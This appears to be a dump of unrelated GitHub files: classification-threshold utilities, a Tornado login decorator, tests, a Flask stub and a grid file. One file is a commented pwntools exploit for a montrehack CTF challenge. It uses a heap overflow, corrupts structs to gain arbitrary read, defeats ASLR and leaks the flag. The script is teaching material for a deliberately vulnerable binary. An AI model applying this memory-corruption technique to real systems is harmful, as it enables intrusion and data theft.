scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, num_classes]
labels: ground truth labels,
numpy array with shape [num_examples, num_classes]
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
thresholds = [0.5] * num_classes
predictions = np.greater(scores, thresholds).astype(np.int32)
best_metric = objective(labels, predictions)
return best_metric, thresholds
def get_binary_threshold(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN, num_thresholds: int = 100,
) -> Tuple[float, float]:
"""Finds best threshold for binary classification task based on cross-validation estimates.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, ]
labels: ground truth labels, numpy array with shape [num_examples, ]
objective: callable function, metric which we want to maximize
        num_thresholds: number of thresholds to try for each class
Returns:
tuple with best found objective score and threshold
"""
thresholds = np.linspace(scores.min(), scores.max(), num=num_thresholds)
metric_values = []
for threshold in thresholds:
predictions = (scores >= threshold).astype(np.int32)
if np.sum(predictions) > 0:
metric_value = objective(labels, predictions)
metric_values.append(metric_value)
else:
metric_values.append(0.0)
if np.max(metric_values) == 0.0:
best_metric_value = 0.0
best_threshold = 1.0
else:
best_metric_value = metric_values[np.argmax(metric_values)]
best_threshold = thresholds[np.argmax(metric_values)]
return best_metric_value, best_threshold
def get_multiclass_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
) -> Tuple[List[float], List[float]]:
"""Finds best thresholds for multiclass classification task.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, num_classes]
labels: ground truth labels, numpy array with shape [num_examples, num_classes]
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
metrics = [0.0] * num_classes
thresholds = [0.0] * num_classes
# score threshold -> classes with such score
classes_by_threshold = defaultdict(list)
for class_index in range(num_classes):
for score in np.unique(scores[:, class_index]):
classes_by_threshold[score].append(class_index)
for threshold in sorted(classes_by_threshold):
for class_index in classes_by_threshold[threshold]:
metric_value = objective(labels[:, class_index], scores[:, class_index] >= threshold)
if metric_value > metrics[class_index]:
metrics[class_index] = metric_value
thresholds[class_index] = threshold
return metrics, thresholds
def get_multilabel_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
):
"""Finds best thresholds for multilabel classification task.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, num_classes]
labels: ground truth labels, numpy array with shape [num_examples, num_classes]
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = labels.shape[1]
metrics = [0.0] * num_classes
thresholds = [0.0] * num_classes
for class_index in range(num_classes):
best_metric, best_threshold = get_binary_threshold(
labels=labels[:, class_index], scores=scores[:, class_index], objective=objective,
)
metrics[class_index] = best_metric
thresholds[class_index] = best_threshold
return metrics, thresholds
def get_binary_threshold_cv(
scores: np.ndarray,
labels: np.ndarray,
objective: METRIC_FN,
num_splits: int = 5,
num_repeats: int = 1,
random_state: int = 42,
):
"""Finds best threshold for binary classification task
based on cross-validation estimates.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, ]
labels: ground truth labels, numpy array with shape [num_examples, ]
objective: callable function, metric which we want to maximize
num_splits: number of splits to use for cross-validation
num_repeats: number of repeats to use for cross-validation
random_state: random state to use for cross-validation
Returns:
tuple with best found objective score and threshold
"""
rkf = RepeatedStratifiedKFold(
n_splits=num_splits, n_repeats=num_repeats, random_state=random_state
)
fold_metrics, fold_thresholds = [], []
for train_index, valid_index in rkf.split(labels, labels):
labels_train, labels_valid = labels[train_index], labels[valid_index]
scores_train, scores_valid = scores[train_index], scores[valid_index]
_, best_threshold = get_binary_threshold(
labels=labels_train, scores=scores_train, objective=objective,
)
valid_predictions = (scores_valid >= best_threshold).astype(np.int32)
best_metric_value = objective(labels_valid, valid_predictions)
fold_metrics.append(best_metric_value)
fold_thresholds.append(best_threshold)
return np.mean(fold_metrics), np.mean(fold_thresholds)
def get_multilabel_thresholds_cv(
scores: np.ndarray,
labels: np.ndarray,
objective: METRIC_FN,
num_splits: int = 5,
num_repeats: int = 1,
random_state: int = 42,
):
"""Finds best thresholds for multilabel classification task
based on cross-validation estimates.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, num_classes]
labels: ground truth labels, numpy array with shape [num_examples, num_classes]
objective: callable function, metric which we want to maximize
num_splits: number of splits to use for cross-validation
num_repeats: number of repeats to use for cross-validation
random_state: random state to use for cross-validation
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = labels.shape[1]
metrics = [0.0] * num_classes
thresholds = [0.0] * num_classes
for class_index in range(num_classes):
best_metric, best_threshold = get_binary_threshold_cv(
labels=labels[:, class_index],
scores=scores[:, class_index],
objective=objective,
num_splits=num_splits,
num_repeats=num_repeats,
random_state=random_state,
)
metrics[class_index] = best_metric
thresholds[class_index] = best_threshold
return metrics, thresholds
def get_thresholds_greedy(
scores: np.ndarray,
labels: np.ndarray,
score_fn: Callable,
num_iterations: int = 100,
num_thresholds: int = 100,
thresholds: np.ndarray = None,
patience: int = 3,
atol: float = 0.01,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for classification task with brute-force algorithm.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
score_fn: callable function, based on (scores, labels, thresholds)
num_iterations: number of iteration for brute-force algorithm
        num_thresholds: number of thresholds to try for each class
thresholds: baseline thresholds, which we want to optimize
patience: maximum number of iteration before early stop exit
atol: minimum required improvement per iteration for early stop exit
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
if thresholds is None:
thresholds = [0.5] * num_classes
best_metric = score_fn(scores, labels, thresholds)
iteration_metrics = []
for i in range(num_iterations):
if len(iteration_metrics) >= patience:
if best_metric < iteration_metrics[i - patience] + atol:
break
for class_index in range(num_classes):
current_thresholds = thresholds.copy()
class_scores = []
class_thresholds = np.linspace(
scores[:, class_index].min(), scores[:, class_index].max(), num=num_thresholds,
)
for threshold in class_thresholds:
current_thresholds[class_index] = threshold
class_score = score_fn(scores, labels, current_thresholds)
class_scores.append(class_score)
best_class_score = np.max(class_scores)
best_score_index = np.argmax(class_scores)
if best_class_score > best_metric:
best_metric = best_class_score
thresholds[class_index] = class_thresholds[best_score_index]
iteration_metrics.append(best_metric)
return best_metric, thresholds
def _multilabel_score_fn(scores, labels, thresholds, objective):
predictions = np.greater(scores, thresholds).astype(np.int32)
return objective(labels, predictions)
def get_multilabel_thresholds_greedy(
scores: np.ndarray,
labels: np.ndarray,
objective: METRIC_FN,
num_iterations: int = 100,
num_thresholds: int = 100,
thresholds: np.ndarray = None,
patience: int = 3,
atol: float = 0.01,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for multilabel classification task with brute-force algorithm.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
objective: callable function, metric which we want to maximize
num_iterations: number of iteration for brute-force algorithm
        num_thresholds: number of thresholds to try for each class
thresholds: baseline thresholds, which we want to optimize
patience: maximum number of iteration before early stop exit
atol: minimum required improvement per iteration for early stop exit
Returns:
tuple with best found objective score and per-class thresholds
"""
best_metric, thresholds = get_thresholds_greedy(
scores=scores,
labels=labels,
score_fn=partial(_multilabel_score_fn, objective=objective),
num_iterations=num_iterations,
num_thresholds=num_thresholds,
thresholds=thresholds,
patience=patience,
atol=atol,
)
return best_metric, thresholds
def _multiclass_score_fn(scores, labels, thresholds, objective):
scores_copy = scores.copy()
scores_copy[np.less(scores, thresholds)] = 0
predictions = scores_copy.argmax(axis=1)
return objective(labels, predictions)
def get_multiclass_thresholds_greedy(
scores: np.ndarray,
labels: np.ndarray,
objective: METRIC_FN,
num_iterations: int = 100,
num_thresholds: int = 100,
thresholds: np.ndarray = None,
patience: int = 3,
atol: float = 0.01,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for multiclass classification task with brute-force algorithm.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
objective: callable function, metric which we want to maximize
num_iterations: number of iteration for brute-force algorithm
        num_thresholds: number of thresholds to try for each class
thresholds: baseline thresholds, which we want to optimize
patience: maximum number of iteration before early stop exit
atol: minimum required improvement per iteration for early stop exit
Returns:
tuple with best found objective score and per-class thresholds
"""
best_metric, thresholds = get_thresholds_greedy(
scores=scores,
labels=labels,
score_fn=partial(_multiclass_score_fn, objective=objective),
num_iterations=num_iterations,
num_thresholds=num_thresholds,
thresholds=thresholds,
patience=patience,
atol=atol,
)
return best_metric, thresholds
def get_best_multilabel_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for multilabel classification task.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
best_metric, best_thresholds = 0.0, []
for baseline_thresholds_fn in [
get_baseline_thresholds,
get_multiclass_thresholds,
get_binary_threshold,
get_multilabel_thresholds,
]:
_, baseline_thresholds = baseline_thresholds_fn(
labels=labels, scores=scores, objective=objective,
)
if isinstance(baseline_thresholds, (int, float)):
baseline_thresholds = [baseline_thresholds] * num_classes
metric_value, thresholds_value = get_multilabel_thresholds_greedy(
labels=labels, scores=scores, objective=objective, thresholds=baseline_thresholds,
)
if metric_value > best_metric:
best_metric = metric_value
best_thresholds = thresholds_value
return best_metric, best_thresholds
def get_best_multiclass_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for multiclass classification task.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
best_metric, best_thresholds = 0.0, []
labels_onehot = np.zeros((labels.size, labels.max() + 1))
labels_onehot[np.arange(labels.size), labels] = 1
for baseline_thresholds_fn in [
get_baseline_thresholds,
get_multiclass_thresholds,
get_binary_threshold,
get_multilabel_thresholds,
]:
_, baseline_thresholds = baseline_thresholds_fn(
labels=labels_onehot, scores=scores, objective=objective,
)
if isinstance(baseline_thresholds, (int, float)):
baseline_thresholds = [baseline_thresholds] * num_classes
metric_value, thresholds_value = get_multiclass_thresholds_greedy(
labels=labels, scores=scores, objective=objective, thresholds=baseline_thresholds,
)
if metric_value > best_metric:
best_metric = metric_value
best_thresholds = thresholds_value
return best_metric, best_thresholds
__all__ = [
"get_baseline_thresholds",
"get_binary_threshold",
"get_multiclass_thresholds",
"get_multilabel_thresholds",
"get_binary_threshold_cv",
"get_multilabel_thresholds_cv",
"get_thresholds_greedy",
"get_multilabel_thresholds_greedy",
"get_multiclass_thresholds_greedy",
"get_best_multilabel_thresholds",
"get_best_multiclass_thresholds",
]
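# Hypothetical usage sketch (not part of the module): searching per-class
# thresholds that maximize macro F1 on random multilabel data; assumes
# scikit-learn is installed (it is already imported at the top).
if __name__ == '__main__':
    from sklearn.metrics import f1_score
    rng = np.random.RandomState(42)
    demo_scores = rng.rand(200, 3)
    demo_labels = (rng.rand(200, 3) > 0.5).astype(np.int32)
    metrics, thresholds = get_multilabel_thresholds(
        demo_scores, demo_labels, partial(f1_score, average='macro')
    )
    print(metrics, thresholds)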
|
[
"noreply@github.com"
] |
Pandinosaurus.noreply@github.com
|
598c1c9cd8f05d484e01315b7d163bcd17656212
|
0bc31d7f07a135e3909e7caf33246dd52999b50f
|
/common/decorator.py
|
0149f457a77e062c759d593242274aa58df0204c
|
[] |
no_license
|
shelmesky/wisemonitor
|
db022d3382fe39033ae53178edd7d4b6cfa1a95b
|
905fec5d58a08851089e39e617e8d52363b7f36c
|
refs/heads/master
| 2021-01-10T21:04:35.992790
| 2014-06-30T10:56:53
| 2014-06-30T10:56:53
| 12,806,391
| 4
| 5
| null | 2016-07-14T07:41:52
| 2013-09-13T09:47:01
|
Go
|
UTF-8
|
Python
| false
| false
| 328
|
py
|
import functools
def require_login(method):
    @functools.wraps(method)  # preserve the wrapped handler's name/docstring
    def wrapper(self, *args, **kwargs):
user = self.get_secure_cookie("wisemonitor_user")
uri = self.request.uri
if not user:
self.redirect("/login/?next=%s" % uri)
else:
return method(self, *args, **kwargs)
return wrapper
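# Hypothetical usage sketch (not part of the original file): the
# get_secure_cookie/redirect calls imply a Tornado RequestHandler, e.g.
#
#   import tornado.web
#
#   class IndexHandler(tornado.web.RequestHandler):
#       @require_login
#       def get(self):
#           self.write('hello')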
|
[
"roy.lieu@gmail.com"
] |
roy.lieu@gmail.com
|
3b2bf05909e2b6c2de791c1388a76308d4c4e735
|
1ad3409413ee0bd02e81199efd1f83469b25737c
|
/2020-09-16/2.py
|
6ff89e40f649c40b8595660cab7acba17613d280
|
[] |
no_license
|
montrehack/challenges
|
4711552e968fd1a0783659f708586d347d744672
|
d5f419417a651c1ee456d5fed49a4bb06476f1b9
|
refs/heads/master
| 2022-05-09T09:52:51.609548
| 2022-04-24T00:37:45
| 2022-04-24T00:37:45
| 12,901,416
| 28
| 12
| null | 2022-04-24T00:37:46
| 2013-09-17T17:00:54
|
PHP
|
UTF-8
|
Python
| false
| false
| 9,036
|
py
|
from pwn import *
from struct import pack, unpack
from sys import exit
DEBUG = False
REMOTE = None
REMOTE = 'ctf.segfault.me'
RVA_HEAP_ALLOC = 0xEDE # readelf -s chal | grep heap_alloc (Windows)
RVA_HEAP_ALLOC = 0x145E # readelf -s chal | grep heap_alloc (Linux)
RVA_FLAG_TWO = 0x203020 # readelf -s chal | grep flag_two (Windows)
RVA_FLAG_TWO = 0x5020 # readelf -s chal | grep flag_two (Linux)
if DEBUG:
P = gdb.debug('./chal')
elif REMOTE:
P = remote(REMOTE, 3000)
else:
P = process(['./chal'])
P.recvuntil("> ")
def run(cmd):
P.sendline(cmd)
out = P.recvuntil("> ")
return out
"""
Things are a bit more complicated now, since the second flag is not on the heap.
GOAL:
We will need to create an arbitrary read primitive that lets us read anywhere we want.
Of course, we also need to figure out where the second flag is, and this means defeating ASLR.
ARBITRARY READ:
In challenge 1, we overwrote a `canvas_t` to corrupt its canvas->private flag. In doing so,
you may have noticed that we corrupted the width and height of the canvas. Going further,
we should also be able to corrupt the `canvas->data` base address. Printing a canvas with a corrupt
`canvas->data` will likely result in a segfault, but it can also be used to perform arbitrary reads
if we can write a valid address in the `data` field.
Recall the canvas_t layout:
typedef struct canvas_
{
char *title; // 8B
uint16_t width, height; // 4B
uint16_t private; // 2B (canvas_t + 12)
uint16_t id; // 2B
char *data; // 8B
struct canvas_ *next; // 8B
} canvas_t; // 32B (0x20)
If we overwrite data with the address of the second FLAG, we can simply print this canvas with its new ID
to recover the FLAG.
DEFEATING ASLR:
To defeat ASLR, we will need the address of any symbol in the binary, since we can compute the base
address using the formula `BASE = ADDRESS - RVA`. Once we know the base address, we can compute the absolute
address of any symbol in the binary using the same formula.
`readelf -s chal` shows that there is a symbol called `flag_two` at RVA 0x203020.
EXPLOIT:
We know, from reading through `heap.h` that `alloc_t` has a chunk pointer, which has a
pointer to the heap, which ultimately has a pointer to the allocator functions
(`heap_free` and `heap_grow`). If we can leak this address, we can then leak the second flag.
It might be tempting to try a technique similar to the first challenge, but the `canvas->title` overflow
is quite limiting as it will stop reading bytes at the first NUL terminator it encounters, and
would require continually re-allocating the preceding canvas.
A more reliable solution is to use a combination of 3 canvas instances to build an easy to use
arbitrary read primitive.
Given the (simplified) heap layout:
+----------+----------+----------+
| Canvas 1 | Canvas 2 | Canvas 3 |
+----------+----------+----------+
The idea is as follows:
1. Canvas 1 is freed, and re-allocated, overflowing its `title` field to
corrupt canvas 2's width and height. The resulting `c2->data` can now
be indexed out of bounds when performing an `edit` command.
2. `edit` is used on Canvas 2 to accurately corrupt canvas 3.
3. Canvas 3 is used to perform arbitrary reads of the desired size.
4. Canvas 2 and 3 are used in conjunction to perform several complex reads
without needing re-allocations.
pwndbg> hexdump ((uint8_t*)c) 100
+0000 0x7ffff75e3030 70 30 5e f7 ff 7f 00 00 27 00 0f 00 00 00 01 00 │p0^.│....│'...│....│
+0010 0x7ffff75e3040 a0 30 5e f7 ff 7f 00 00 00 00 00 00 00 00 00 00 │.0^.│....│....│....│
+0020 0x7ffff75e3050 40 95 75 55 55 55 00 00 10 00 00 00 00 00 00 00 │@.uU│UU..│....│....│
+0030 0x7ffff75e3060 00 00 00 00 00 00 00 00 80 30 5e f7 ff 7f 00 00 │....│....│.0^.│....│
>> +0040 0x7ffff75e3070 41 74 61 72 69 00 00 00 00 00 00 00 00 00 00 00 │Atar│i...│....│....│ ; c1->title
+0050 0x7ffff75e3080 40 95 75 55 55 55 00 00 4b 02 00 00 00 00 00 00 │@.uU│UU..│K...│....│
+0060 0x7ffff75e3090 00 00 00 00 │....│ │ │ │
...
pwndbg> hexdump 0x7ffff75e3070+635 v
+0000 0x7ffff75e32eb 40 95 75 55 55 55 00 00 20 00 00 00 00 00 00 00 │@.uU│UU..│....│....│
+0010 0x7ffff75e32fb 00 00 00 00 00 00 00 00 2b 33 5e f7 ff 7f 00 00 │....│....│+3^.│....│
+0020 0x7ffff75e330b 4b 33 5e f7 ff 7f 00 00 3d 00 18 00 00 00 02 00 │K3^.│....│=...│....│ ; c2->width (0x3d == 61)
+0030 0x7ffff75e331b 7b 33 5e f7 ff 7f 00 00 30 30 5e f7 ff 7f 00 00 │{3^.│....│00^.│....│
Calculate the c2->width offset:
0x7ffff75e330b + 8 == 0x7ffff75e3313
0x7ffff75e3313 - 0x7ffff75e3070 == 675
Calculate the c3->width offset from c2->data to be able to corrupt c3.
pwndbg> hexdump 0x7ffff75e330b+0x50
+0000 0x7ffff75e335b 40 95 75 55 55 55 00 00 ba 05 00 00 00 00 00 00 │@.uU│UU..│....│....│
+0010 0x7ffff75e336b 00 00 00 00 00 00 00 00 35 39 5e f7 ff 7f 00 00 │....│....│59^.│....│
+0020 0x7ffff75e337b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │....│....│....│....│
c2->data = 0x7ffff75e337b
pwndbg> hexdump 0x7ffff75e3030+0x40+675+1500 150 v
+0000 0x7ffff75e38ef 20 20 20 20 20 20 20 2d 2d 27 20 20 20 20 20 20 │....│...-│-'..│....│
+0010 0x7ffff75e38ff 20 20 60 2d 60 2d 2d 60 2d 2d 2e 5f 5f 5f 2e 2d │..`-│`--`│--._│__.-│
+0020 0x7ffff75e390f 27 2d 27 2d 2d 2d 20 20 20 20 20 20 20 20 20 20 │'-'-│--..│....│....│
+0030 0x7ffff75e391f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │....│....│....│....│
+0040 0x7ffff75e392f 20 20 20 20 00 00 40 95 75 55 55 55 00 00 20 00 │....│..@.│uUUU│....│
+0050 0x7ffff75e393f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 75 39 │....│....│....│..u9│
+0060 0x7ffff75e394f 5e f7 ff 7f 00 00 95 39 5e f7 ff 7f 00 00 25 00 │^...│...9│^...│..%.│ ; c3->width (0x25)
+0070 0x7ffff75e395f 01 00 01 00 03 00 c5 39 5e f7 ff 7f 00 00 0b 33 │....│...9│^...│...3│ ; c3->height, c3->private, c3->id, c3->data
+0080 0x7ffff75e396f 5e f7 ff 7f 00 00 40 95 75 55 55 55 00 00 10 00 │^...│..@.│uUUU│....│
+0090 0x7ffff75e397f 00 00 00 00 00 00
0x7ffff75e395d - 0x7ffff75e337b = 1506
"""
C1_SIZE = 675 # Offset between c1->title and c2->width
C3_SIZE = 1506 # offset between c2->data and c3->width
def corrupt_c2():
info("Corrupting canvas2")
run("del 1")
run("new")
run("10")
run("10")
run("A" * C1_SIZE + "\xFF\xFF\x01")
# Now c2->width is 0xFFFF and c2->height is 1.
def read(addr, size):
info(f"Reading {size} bytes @ 0x{addr:016x}")
cmd = (
pack("<H", size) # c3->width
+ pack("<H", 1) # c3->height
+ b"\0\0" # c3->private
+ pack("<H", 3) # c3->id
+ pack("<Q", addr) # c3->data
)
if b"\x0a" in cmd:
error("Bad byte in canvas3! new line is not allowed.")
exit(1)
P.sendline(
"edit 2"
) # We will edit the 65535x1 buffer. `fgets` stops reading at `\n`.
P.recvuntil("New Data: ")
P.send((b"3" * C3_SIZE) + cmd + b"\x0a")
P.recvuntil(b"> ")
out = run("show 3")
return out[:size]
corrupt_c2()
# Now let's show the buffer for c2->data, which will leak 0xFFFF bytes including the actual buffer bytes.
# This will let us `show 2` and leak the address of the chunk.
# Remember that the canvas_t struct starts with title, width, so we can use C3_SIZE - 8 - sizeof(alloc_t) to calculate the
# position of alloc->chunk.
CHUNK_OFFSET = C3_SIZE - 8 - 32
(chunk_ptr,) = unpack("<Q", run("show 2")[CHUNK_OFFSET : CHUNK_OFFSET + 8])
success(f"chunk @ 0x{chunk_ptr:x}")
# Now we can configure C3 to leak the chunk_t struct, which contains the heap pointer:
#
# typedef struct chunk_
# {
# struct heap_ *heap;
# struct alloc_ *allocs;
# struct chunk_ *next;
# } chunk_t;
(heap_ptr,) = unpack("<Q", read(chunk_ptr, 8))
success(f"heap @ 0x{heap_ptr:x}")
# Finally we can leak the `heap_alloc` address to defeat ASLR. Having a known function pointer
# in the image will let us compute the base address, and any other known symbol in the image.
# heap_alloc is located at `heap_t + 16`.
(heap_alloc,) = unpack("<Q", read(heap_ptr + 16, 8))
success(f"heap_alloc @ 0x{heap_alloc:x}")
BASE = heap_alloc - RVA_HEAP_ALLOC
FLAG = BASE + RVA_FLAG_TWO
info(f"BaseAddress=0x{BASE:x} FlagAddress=0x{FLAG:x}")
flag = read(FLAG, 37).decode()
success(f"FLAG: {flag}")
P.close()
|
[
"alex@segfault.me"
] |
alex@segfault.me
|
fe15e96de78340081044c390097e0aa7fe290d4f
|
45a00ac27ac8745e41ee89e89ae798ab052896d0
|
/interface1/venv/case/mail.py
|
5a07871a1b4d241c25c33d70f9ba2624aebe55c8
|
[] |
no_license
|
jiangll888/interface
|
c7b96f5c8105e66a98f8e951b897c751d882cd6d
|
3f3fa6d1d9591a8331eb660aa040861edb44a610
|
refs/heads/master
| 2020-04-30T13:10:59.372448
| 2019-03-22T02:52:18
| 2019-03-22T02:52:18
| 176,848,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 992
|
py
|
from util.send_mail import SendMail
from util.db_config import OperaDB
class RunMail:
def send_mail(self,filename=None):
op = OperaDB()
se = SendMail()
result_list = op.get_all("select result from `case`;")
result_list1 = [[value for key,value in d.items()][0] for d in result_list]
pass_count = 0.0
fail_count = 0.0
for i in result_list1:
if i == "pass":
pass_count += 1
else:
fail_count += 1
print(pass_count,fail_count)
count_num = pass_count +fail_count
result = "%.2f%%" % (pass_count/count_num*100)
print(result)
content = "本次自动化测试结果:通过"+ str(pass_count) + "个,失败" + str(fail_count) +"个,通过率为" \
+ str(result)
se.send_mail(["jiangliulin@163.com"],"自动化结果",content,filename)
if __name__ == "__main__":
r = RunMail()
r.send_mail("../report/test.html")
|
[
"jiangliulin@163.com"
] |
jiangliulin@163.com
|
00c3a56f1c545aa36ab9dc7ecd7a9bb798961fe0
|
caa175a933aca08a475c6277e22cdde1654aca7b
|
/tests/schema/product/query/snapshots/snap_test_all_product_file_paths.py
|
b5339588cbf10678ad6205db41a22f2ee60c7a11
|
[
"MIT"
] |
permissive
|
simonsobs/acondbs
|
01d68ae40866461b85a6c9fcabdfbea46ef5f920
|
d18c7b06474b0dacb1dcf1c6dbd1e743407645e2
|
refs/heads/main
| 2023-07-07T04:33:40.561273
| 2023-06-28T22:08:00
| 2023-06-28T22:08:00
| 239,022,783
| 0
| 1
|
MIT
| 2023-06-26T20:36:39
| 2020-02-07T21:07:46
|
Python
|
UTF-8
|
Python
| false
| false
| 2,557
|
py
|
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots['test_schema[all] 1'] = {
'data': {
'allProductFilePaths': {
'edges': [
{
'node': {
'note': None,
'path': 'site2:/another/way/map1',
'pathId': '1',
'product': {'name': 'map1'},
}
},
{
'node': {
'note': None,
'path': 'site1:/path/to/map2',
'pathId': '2',
'product': {'name': 'map2'},
}
},
{
'node': {
'note': None,
'path': 'site1:/path/to/map3',
'pathId': '3',
'product': {'name': 'map3'},
}
},
{
'node': {
'note': None,
'path': 'site2:/another/way/map3',
'pathId': '4',
'product': {'name': 'map3'},
}
},
{
'node': {
'note': None,
'path': 'site1:/path/to/beam1',
'pathId': '5',
'product': {'name': 'beam1'},
}
},
{
'node': {
'note': None,
'path': 'site2:/another/way/beam1',
'pathId': '6',
'product': {'name': 'beam1'},
}
},
{
'node': {
'note': None,
'path': 'site1:/path/to/beam2',
'pathId': '7',
'product': {'name': 'beam2'},
}
},
{
'node': {
'note': 'sample comment',
'path': 'site1:/path/to/map1',
'pathId': '8',
'product': {'name': 'map1'},
}
},
],
'totalCount': 8,
}
}
}
|
[
"tai.sakuma@gmail.com"
] |
tai.sakuma@gmail.com
|
41f5580fcdacf988e3d0088c4ff35723a7277bb3
|
d9563800aabef6dd47c3ad28491686ebe552bf10
|
/web.py
|
ffa925faad9315654c04e91ab80269e992f92551
|
[] |
no_license
|
drovn003/heroku
|
b88f858b7328500b39c5a418aefcab3c1e7a330e
|
d7560535a65f49e6675f92a68cd9319092ca9de5
|
refs/heads/master
| 2020-04-02T18:30:07.883122
| 2018-10-25T16:30:07
| 2018-10-25T16:30:07
| 154,702,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
    return 'hello, world'
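# Hypothetical run sketch (not part of the original file): on Heroku this app
# would typically be served by gunicorn via a Procfile ("web: gunicorn web:app");
# locally, the built-in development server can be used.
if __name__ == '__main__':
    app.run()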
|
[
"noreply@github.com"
] |
drovn003.noreply@github.com
|
b6ebc8726aa81143cc63fd8d1964d325186e3b94
|
96cb22932f6f17a64d4ae54cd3e5db11da1e7092
|
/tests/unit/test_pathify_by_key_ends.py
|
b0cccdc6152b7b46c83d5ec7da17e3099a79a6ae
|
[
"MIT"
] |
permissive
|
xguse/snaketools
|
4f076cce25f5b4dcf7f5ad542e2a5ebef5ff52a3
|
ba3b68088bd9bb656b9ad64656a537bc1cfccdb4
|
refs/heads/master
| 2021-01-23T12:05:00.217621
| 2018-06-08T16:04:08
| 2018-06-08T16:04:08
| 102,645,205
| 1
| 0
|
MIT
| 2018-06-01T17:03:32
| 2017-09-06T18:41:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,349
|
py
|
"""Unit test the pathify_by_key_ends function."""
from pathlib import Path
from snaketools import snaketools
from tests.test_snaketools import * # noqa: F403,F401
def test_pathify_this():
"""Ensure pathify_this returns expected values."""
assert snaketools.pathify_this("TEXT_FILE")
assert snaketools.pathify_this("TEXT_PATH")
assert snaketools.pathify_this("TEXT_DIR")
assert snaketools.pathify_this("DIR")
assert not snaketools.pathify_this("TEXT")
def test_pathify_by_key_ends(config_1_dict):
"""Ensure pathify_by_key_ends returns expected types."""
original = config_1_dict
pathified = snaketools.pathify_by_key_ends(dictionary=original)
assert isinstance(pathified.COMMON, dict)
assert isinstance(pathified.COMMON.RUN_NAME, str)
assert isinstance(pathified.COMMON.OUT_DIR, Path)
assert isinstance(pathified.COMMON.INTERIM_DIR, Path)
assert isinstance(pathified.COMMON.DRAW_RULE, str)
assert isinstance(pathified.COMMON.DRAW_PRETTY_NAMES, bool)
assert isinstance(pathified.RULE_1, dict)
assert isinstance(pathified.RULE_1.PARAMS, dict)
assert isinstance(pathified.RULE_1.PARAMS.PARAM_1, int)
assert isinstance(pathified.RULE_1.PARAMS.PARAM_2, str)
assert isinstance(pathified.RULE_1.IN, dict)
assert isinstance(pathified.RULE_1.IN.IN_FILE_1_PATH, Path)
|
[
"w.gus.dunn@gmail.com"
] |
w.gus.dunn@gmail.com
|
34504f3e195a7d0a38dcbf2515ee3814f9664a6d
|
f288b7103133eb101304308d4f4c9c827b732056
|
/experiences/sofaSceneLowBridge/topo.py
|
c98a9bb703207245cdb091af83f01ef15927053d
|
[] |
no_license
|
zaneck/evolveRobots
|
3c9dd1b0196df28b2c33ffd3c500dd7cbaa33ba2
|
02616fb8dbe1fffd57cd6e078338a7a394d010de
|
refs/heads/master
| 2020-04-11T01:29:27.124160
| 2016-09-30T12:03:31
| 2016-09-30T12:03:31
| 60,244,000
| 1
| 0
| null | 2016-09-29T11:46:00
| 2016-06-02T07:56:10
|
Python
|
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
# topology = [
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
